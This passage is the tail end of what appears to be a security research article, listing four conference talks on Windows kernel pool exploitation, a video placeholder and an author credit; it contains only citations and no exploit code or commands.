[1] Tarjei Mandt. Kernel Pool Exploitation on Windows 7. Black Hat DC, 2011
[2] Nikita Tarakanov. Kernel Pool Overflow from Windows XP to Windows 8. ZeroNights, 2011
[3] Kostya Kortchinsky. Real world kernel pool exploitation. SyScan, 2008
[4] SoBeIt. How to exploit Windows kernel memory pool. X’con, 2005

Video Demonstration:

[embedded video]

Author: Artem Shishkin, Positive Research.
